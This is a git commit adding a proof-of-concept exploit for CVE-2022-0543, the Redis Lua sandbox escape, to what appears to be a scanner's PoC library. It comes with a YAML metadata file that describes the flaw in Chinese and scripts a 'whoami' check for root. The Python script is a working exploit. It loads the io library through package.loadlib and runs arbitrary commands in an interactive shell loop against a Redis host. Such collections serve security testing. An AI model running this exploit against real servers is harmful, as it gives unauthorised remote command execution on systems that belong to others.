add CVE-2022-0543

2023-03-08 20:30:50 +08:00 · 2023-03-08 20:30:50 +08:00 · 2d35b06f35
parent 92c5af3d81
commit 2d35b06f35
2 changed files with 83 additions and 0 deletions
--- a/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py
+++ b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py
@ -0,0 +1,30 @@
+import redis
+import sys
+
+def echoMessage():
+	version = """  
+      [#] Create By ::
+        _                     _    ___   __   ____                             
+       / \   _ __   __ _  ___| |  / _ \ / _| |  _ \  ___ _ __ ___   ___  _ __  
+      / _ \ | '_ \ / _` |/ _ \ | | | | | |_  | | | |/ _ \ '_ ` _ \ / _ \| '_ \ 
+     / ___ \| | | | (_| |  __/ | | |_| |  _| | |_| |  __/ | | | | | (_) | | | |
+    /_/   \_\_| |_|\__, |\___|_|  \___/|_|   |____/ \___|_| |_| |_|\___/|_| |_|
+                   |___/            By https://aodsec.com                                           
+    """
+	print(version)
+
+def shell(ip,port,cmd):
+	lua= 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("'+cmd+'", "r"); local res = f:read("*a"); f:close(); return res'
+	r  =  redis.Redis(host = ip,port = port)
+	script = r.eval(lua,0)
+	print(script)
+
+if __name__ == '__main__':
+	echoMessage()
+	ip = "127.0.0.1"
+	port = "6379"
+	while True:
+		cmd = input("input exec cmd:(q->exit)\n>>")
+		if cmd == "q" or cmd == "exit":
+			sys.exit()
+		shell(ip,port,cmd)
--- a/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml
+++ b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml
@ -0,0 +1,53 @@
+FormatVer: 20230306
+Id: CVE-2022-0543
+Belong: system
+PocHazardLevel: low
+Source: https://github.com/aodsec/CVE-2022-0543
+SiteInfo:
+    Name: Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。
+    Severity: critical
+    Description:
+        Debian 以及 Ubuntu 发行版的源在打包 Redis 时，不慎在 Lua 沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数，进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数，即可获得io库，再使用其执行命令。
+    ScopeOfInfluence:
+        2.2 <= redis < 5.0.13
+        2.2 <= redis < 6.0.15
+        2.2 <= redis < 6.2.5
+    References:
+      - http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html
+      - https://nvd.nist.gov/vuln/detail/CVE-2022-0543
+    SiteClassification:
+        CvssMetrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+        CvssScore: 10.0
+        CveId: CVE-2022-0543
+        CweId: None
+        CnvdId: None
+        KveId: None
+    Tags:
+        - cve2022
+        - redis
+        - RCE
+SiteRequests:
+    Implement: 
+        ImArray:
+            - Inter : python3
+              InterArgs :
+              Exec : CVE-2022-0543.py
+              Args : 
+        ExpireTime:       #second
+
+        # < input
+        # > output 
+        # . wait
+        # ? condition
+        # : content
+        #
+        #组合起来
+        # >. 等待直到输出 
+        # << 输入字符
+        # >?判断条件
+        Inter:
+            - ">.:>>"  #ture
+            - "<<:whoami\n"
+            - ">.:\n"      #等待输出'\n'
+            - ">?:root" 
+        Condition: None